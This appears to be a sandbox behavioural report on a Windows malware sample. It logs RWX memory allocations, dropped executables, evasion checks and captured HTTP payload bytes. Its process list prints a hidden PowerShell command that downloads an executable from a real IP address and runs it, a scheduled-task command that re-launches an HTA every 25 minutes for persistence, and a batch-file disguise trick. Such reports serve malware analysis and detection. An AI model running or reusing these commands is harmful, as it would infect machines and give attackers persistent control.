NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Local\TempPLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE
file	C:\Users\test22\AppData\Local\Temp\10286670101\zx4PJh6.exe
file	C:\Users\test22\AppData\Local\Temp\10287840101\advnrNo.exe
file	C:\Users\test22\AppData\Local\Temp\10181980101\ZqkKpwG.exe
file	C:\Users\test22\AppData\Local\Temp\440824\Organizations.com

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (7 events)

cmdline	PowerShell -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
cmdline	C:\Windows\System32\cmd.exe /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
cmdline	"C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
cmdline	schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f
cmdline	mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta
cmdline	C:\Windows\system32\cmd.exe /c schtasks /create /tn uA50omaOMzx /tr "mshta C:\Users\test22\AppData\Local\Temp\FSEfTpEuF.hta" /sc minute /mo 25 /ru "test22" /f

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 24, 2025, 10:39 a.m.	thread_identifier: 2812 thread_handle: 0x00000340 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000034c	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: PowerShell parameters: -WindowStyle Hidden $d=$env:temp+'PLMRSQG8INQ893HZ1NHRVSN0K7RLIJHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; filepath: PowerShell	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10181980101\ZqkKpwG.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10181980101\ZqkKpwG.exe	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10286670101\zx4PJh6.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10286670101\zx4PJh6.exe	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\10287840101\advnrNo.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\10287840101\advnrNo.exe	1	1
ShellExecuteExW March 24, 2025, 10:39 a.m.	show_type: 0 filepath_r: C:\Windows\system32\CMD.exe parameters: /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat filepath: C:\Windows\System32\cmd.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory March 24, 2025, 10:39 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x02ec0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 24, 2025, 10:39 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00014000', u'virtual_address': u'0x000d4000', u'entropy': 7.050524787063635, u'name': u'.rsrc', u'virtual_size': u'0x00013e44'}

entropy

7.05052478706

description

A section with a high entropy has been found

URL downloaded by powershell script (11 events)

Data received	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 01:39:15 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 24 Mar 2025 01:17:20 GMT ETag: "1db000-6310c5d9f93c1" Accept-Ranges: bytes Content-Length: 1945600 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ñ¶BS×,×,×,¼/×,¼)/×,Ç¢(×,Ç¢/×,Ç¢)Ì×,¤Ñ×,¼(×,¼-×,×-g×,Y¢%×,Y¢Ó×,Y¢.×,Rich×,PEL#»gàòÂ@M@pM9Z@WàkÐH\|)M,)M ÀÖ@à.rsrcHÐæ@À.idata àì@À +ðî@àakiehyda 2ð@àpwemnwqq0M@à.taggant0@M"@à
Data received	{Øã÷·$ê¯0ëCÓæWç½Øï×ÒG$UûNP¦¢ìºæ¦!È>÷C3ÙþÈ÷~¦U>Ûâ<47,¡ùtä£>ì/(ç ±`÷UÖî[@óGÇyÍ©a¨T ¹×Në¦_ !ûrAÃ]Ë®zË Ó#§HvIÃ@lºÔÐ¯2 Óõ¯Rÿâù#ÕÔïG¤ÈeÅ$£ a AgÁ5²{_ïÉ_Ms¸òRMeÙñåëØìZKÆOøýL¤!µãD¥ô¥_=¤°ã£CÓ!gàø»§ZË`¦ÛÊä»Z¿1ÒÈ1ç?rÚ/2äþñöì¬1wèÜIü»¡¿ËKÜ§îº¿Gª±(SúXWé1VÀè²}Â¸Oc5aH¥y»À7"Èüo¿þjÑ¥]¡{s I°á° ÓgÇªÿ×Á¦åâ?= ü:tãv¨)Ö;<¯rð¸,18cì¢^Kß@Jî()ºÐûNØg¥Í{:( H³»ga¶P([l#í\]ÁÍè ýØr} ßáîqYâ« çÆ¼yYç¶y!/Ló(e»Âik6úpÌéÅ$çIá$6ßÓÃâÅ Ó3P¿C¬ÕÙg5îL2è[v¸=Q¨ªÏÃTÒõ>(¤\çQïgÇ§ßaó$ A¬BÜ<Èw6ÿÄMªl¯nX$ÝUÁîßS g>L³"ÐàcZ+Ø"÷ú8j&s^7ÃRÀ±%¹"GïB/{NG§³Ù.Ï×¢#<ü<ªìâÒ³79¹#àtzÊbÊÙ}iæ+k§ê}gq4W0ÕÁÏt¾Ü«cx+ë¶þÍ±q(u>Æã¯ËÀ¯Õ2HzõíÂ4ôæ<åmÒÊ=-éÙßÑ7æ»Z Év~5HÃfl5^¦$±x¬Ås5Ófø`7uÕ=Â}©[F'ç#Ây[?ÃTêÎexYëäß¹ß·NéÅo^z¾Ok<Gëh²ñHT´@¿±zg$AÌ»ëóZ±¨þ7Îjêþ_(ÔÄGÚüP£"Oê×JËg?ÇXÆJbË@u§tÖÇÝI:¼º3}lÃ;¨¹[ÛçÉÞ=ABØÐ°ì_Ä³Jx¾ç¿SLkêà/;9p²ÿãkG#·´%¹{S§t?äÕV¾vÅ%ÉØ=¥¹)Mz»Dõø6»dËNT.X>dæ¡»JöGgþ8;OçH°êîPAV§{c+ðØ¨Cìa,È>æ4UM°È¸ØÇi¨ÚðÃiÌ¾vËºöjçâ»<Î^èq¹´W\«ú - Õ³ôÎ@£?¬)øÊøFT\ìz}%ÇDúw¿¦ÞçÈ cwèw;°ÒeóH×YÆ!GÄ¨@³Ñ±òû#ãBz´35 °?×¡³ñ·§&zVãÿetcs?Ú#¿¥c(ãµùÑ ì%CùwÊ¼óÉ¿~+OzTònGã7×5ÖÁÕÃ¿jòwGºcõùÃO)¿´5Û_SxõÚ%?ÌxóòQs.o2d¸Ö±ëÎ»nYðçsºxîÕUyóò&»Ë8ÝÀÃ«nÂÜ°«ÏZ%²§)S±K2pOô6DÃ"ûY³u½5ÿ×iW¡uÌ¨9ñ ÝRxÓýòÿ.ªJ9¦ Ýáß£ÍyèUy2<m làÀsÛ3Lû27`"GnKWÖ/Aí¥°¶Äã3n g'´z;F·²³çëïù·Ö¨ ÏÑÅDØ{EthÂ×G^\´¢¢èÓßÓÈ}¥þÞcù<dç¯Ógà+SÝ å^³.ÁÕ¼}YLz Þ´sÐÃè´½É+ÏËàS°ªBôB&åI#ôÉ-ÑÞ/ÓH.Ùe9ä7#Hh( ÂÑºR-Ç¸´Ì>C7ÌòäJÿÅØå¼ÿø9¢ÝòDRÎÒEmµÞ·³Å¶DüËµÏöc7´DÀ³à¶×QKØªo×Br×^âÖÙ¦·¿ªä4×UoùnÏtÂTwÍÂd{_ô; ·PÕ:¦ûúÆÝæfO¤£ö1ÑUH7ÓD¼Ö¨°QGaúãÛÞ,ÆÏÞåPÃ{vWÚÆCÕ^fü!¥ãÇ¨¸îÛOcBG±W½i£Ò(Àúßê×v#![i ¿Ø{¦e"²Ú±¨B:µ«^d#WÎ-ÆÙ¤À:ø'DSÇ¯Ugñ÷óÈN¾>YÀ_KutA{ç5÷É²Æûx¢YÛçºxîÜP«õÇÇ¬ÔU¢ü,Ç3¯.;5{ï«-3âêq#x%_)p+§SGgAßyöû×\Yáà}rêÃg#gàvÐ.c:Ë<D$Lmü£ äö¨AÊþÐÃÇkÁ(O=?«ûÐfÍ ïDíÁ>ûÄÿ³úK;G\à +jî38$³ ~<õZ¡èi¶VuKBq@PâldTøUÉ?\|c#èksÉ(ñH ·DLûH*ÌGZ3aCzB3CÅ bÖÏvKÖdèO³n÷×êU5ª»)L^P©û¡I¼Ã Ï<µL TÕÛ×þRÌèÅE'Ûw#@ú{z3u@sc¦òàµùÄ®ì#Ñ«#¥Ù»4êÞüëìÅÉê÷ìÝºÒns=? =¢JZø(çXYÎ5¹\|Uékzd>¢l¢Xû"£á%$Ð9Ãf/ûó§U&± §¿¬hú÷?ëLô¿Pûk_pm¿¡Í$¿ÐççõvÕM{4ÿ1@Õ¼ÆVÂ;¿`¸ÈfäÓwg?ç²9+x=nZp¢{ó§jÐFc°=Ù8 Ó¼f«¹²âû¾©]f¤òdO<£â£³VÌ[o!äÑ;:x£\|»P6Çwlå¹oHâÐzÔ¿x\|ÃrºÊL!øÄ§¥ÿHyc¦×R©Oì¦¦ÌÀÇuVç`vê½»µ {éÕtë ä¹¶~µYGa÷@ÓIµ8o/"²éüàf5ûBãa~ò¢ïõ0=ÜäÐÉº§$FGô@âæu¢Åä3sï+·©@Êo(ù¦\|ï?qqAöymrcÀQ^²³úC´`.YÓ¼~AäUÓ¼WÒØA¦±°ÁYÒÝ¾gúÞÓxµbÑ@¸ßt¡Kû)I :%=pò½unâLx#J!Gü ðõ´° %xWD&û"6øÐî2C/²)û7pDÿfª_LµÅÙ±^ÉB=#´þ´¢þÓåÀ{÷ûÔÎQz,eK³xûëHbFTE;i?AjuÞÜùúU@¸ðü®(Íw5Rp Ýüw¾Ê¿#Õù
Data received	+ óáþfÆvLÑøèVÓEG!ß+Î=.(£°ºÃ>¤JÃ®Eáú2Ã5:â\gþX#§¸»¹Xð"ZÒ<²ÄÁÆoÑr6ôÝdSSð] "ð2X».PO°Òõ[(á#òr34=°7gi+%²¯á¹gÐvÝ\Aã±P@©\_ú ªÝ)ñ¶kæ²ãA1f;7ðà}x`õ²^.·nOT§Öü3hYÄÿ×ã¯nâ`V×ùèõ}ÎHúLî¤héÛ[©5[v5ºûs7Õ÷ÅlÛ»i dq¡;qe6£ÀZ5âk,f¿sù§Läª¼_s²Lô:8 ÇóÖjZ¡:Rê6Ý®ó ç¡ùjÒº,ÛºeO¯hîòvKð ²»îöC5ËSösS3u4BÜ IGMõw;ïøÂ¥8MÔ§P[sFõ. ÄñEDñÇH34"½âpn±\uä´ EÖX~ÜÜÕå°;ß6oUkú?Ù¦,àÌnj÷úbì=ÔÕfs+÷YWü^Ç\ 6§ÔæOÈÎ·q\|ôâ±èW=æòA¨Àd7ñ7Ë_ú_°öÊ9´}]½)êjiâm÷ ö²ò 5PåÒkË7y:\'Ãm¶fBÑÔe3o²d?ZÝqt,³'ùCøþ!Õ6%ÈòÀÒÜã ²Ñ¨Á<ä) üJíÓÈ>µXY<; De=<áWøEÕ¦ÑS¯$°ì½òçÁh}ÛÍEÝÄûæ´d Ø~áNwk6@þÂõ4G ËÀtPYaLæIjA¥Ð¦SäúaÙ-én]Òöx®Ä©`?V o,ÙGÃÞìãC¶_òéË/noçÜÀtX¸T#UÊìkY×é[®8}ÈXw+«¼yb«µMH°ë;Á4lH«>4?jGiÞDc®òÄ´}\|ïs²ãCÚS`()wh×êÈ;Ho@ïNK34â ¤ñoÓÿëpûafï-¢+ò;lE;e¿ëçòSRÒo;IÞ¯dK+ë53F èÏ2nò&¯X a$g<«ìUo` 35°hß³"ðàóqªýSnòÃ`¡×¡Øç×U²âné)ÔXFÚùL¿ÉBqÇ±ç[Ó×üQ];2ùB çè\|1InøCTÓ¸_sÚ;ÿwóHTÙ<ëÀo7<w3ûnS&ªXcO§dPý9û°_ú<C\|[©{dþÕ5¸yGA"<§OÒ¯û® ²6ûØsi<Å{¨+Üë#ùqÐ]ã¹¼.Ó×fwÂë òç@v«"Kn¨j ]ÝAìîbkIèç¶+D]:@]qÄÐ¥âÀJ34Aß³¨@ÇãÁM]4É)ýðð1¦ÂkùÕñt 2/ðø1ëßñG¬^¥9{f²bâJ¿xW6ÕO"Z"2W'ÂKKî'ÛO´¸Ü ¯\p#DPw¦[ê³<57ØtÎàªÞ¯²3$í¦ú?T§ø÷x<·´]+ÚÆ#±<ð¨ äRHiLnú»úö3#:}ÂPXÅQ58,ÎÝç- §s¾%ÍNÅÕ¿ÀãÓ³eàuÿd /K²¿G['×oÍ{·FUr'§úë£ÚcC»{º²VßJÈÊÍÓ êÏF¨Ê¸ÍÍB§½¸'ZäæwÊe×§©ðªû²£5G±³4°5]aé`ÄßU\ÕcuwÜ6½V+Z§õó,+Íý¨vE§õÐCÉÈ¼:5Ò®}+½Ó¼v71#qýÉGh.6¹027U)þò÷½ÿÜ>Ë 4_0~#8KG©»©R~Íò WüãÕò§)ÿ¢Bä¨ÿ«u»ÌÒMÍ%V2Ì,øÆTS}@ãFö1XÎ!8Ç$å¤Ã@«óTf%ú¼ÁTóïcÕ×¾hGÃÍ¨±ÓüÖ×9FO®+G:P£@µìù§/ßVÚdE£oS9Îï Æú}3©ëq®²8G^k7Àª5TgoYl"¿fAdæô§¾Hï2ÔOv2ç¼~_lSu1õÇ§ÿÈçmâ°á°~ ¿cúÈ©Úp¬÷ )(x«.DÙ4ÖÅ$Ü¢aiwIÞ,Dµ¥{Ï¦ôvûv±¶üÔ¦O! ÇãEÒ°ïôpñ®ÇGëÚÀ H³>½Cá0=ägãC_e ½qÛ0©ÒßÙùÏQ_q¬í±Ð¾HusâÈØ]-ü¿l6Ø¡èwÿ.+¯úRºÎø\|¥¡j^DË²xfb¼(1ÄËÉëÇÅfÜgÅß¬2ÉÿV-4ÌfÝ±3÷¦SÕÊëgÁ<\|ù~ÙîÝìª/¹f^uë«ÂÙ4°P§JÖÏÜ0%+èÍçAB]Þ(¸Þûu÷EâxÐgîtYúë·F¢ÄCa6mù¨ÄÙ!r¯ÉC%×7×üöfÅMå ßv¶íÍD6&±g²G¤d^\| ö»çwrÌ@IïP¥î&LqZ+ûÞ°=Ñè¿3U Û¾Fu'ßøÆÓ7P+Ð¶ÚÐ®t»§º}ZüöÇ3m1ÌÒVq¥uÜC(Dè×tiÚÔÓûØB7ÝgFäV}àYèßÀÅõñ{v´(µÿ¨K2ÝÀ;2Z2\=ÃE°z oBúÐÄS&8#Võ:ö&°õ÷Lö¤Ü>§CGó(æÀ»=V{¸<ª®Öß-£ÓGkä}1[åÑæG<ÀPD´Wú°äG)Ü£°ôÂ\îÌpùá0¼y è·¿^¿Cy~ùËÞ»#61<'³myÉH6v2ÂO%:6«¨[#Í]Ëdòq"}t@¶ÖßÀ¬ûW¨û3ÛÅN3ÖÝïÒ4¢B!ÄðèR½ãÑaö;·ío?JÏy«gYTC°B0\½'äú®ÕÝ1Ï¥0¶þè{AÒÉ,¥Í1M`ÄËôÊå÷Êç3À<ÔÆ?ä¿iÃw9jJÄÍ\|¨ åûþ^6·Å«¢Av\|Ò¶RHéúÒ[l?(/qÍìÕ÷. ÄàÚ æ½¯©~\|hï]Õ¯.SÊa© /çèë.ð"yqõ'$j»qWãëAþK³ñJ^è3~9Â"/]q:Äü¦xÄw^bï))hGbvÛ²¶V`cW^÷8{º¯¨è¥X@iÁÓîÄwá¿2fñ®Î³s!æpâKòïrxÊãâpTóÃtÂü÷¯W£{²öëºÝØX0¯b{#&ÛÂÚ5Á>¿±wJ¡tªÌº7± &t6Gsà´4÷ójæ«¯¨rÿ%n £ê·§ë¬Õqê:ì·3ÄÞÖÎva·WS\nxGO56ûGwx£4þ@DvnxnÏ¨êcT ß8@ +P
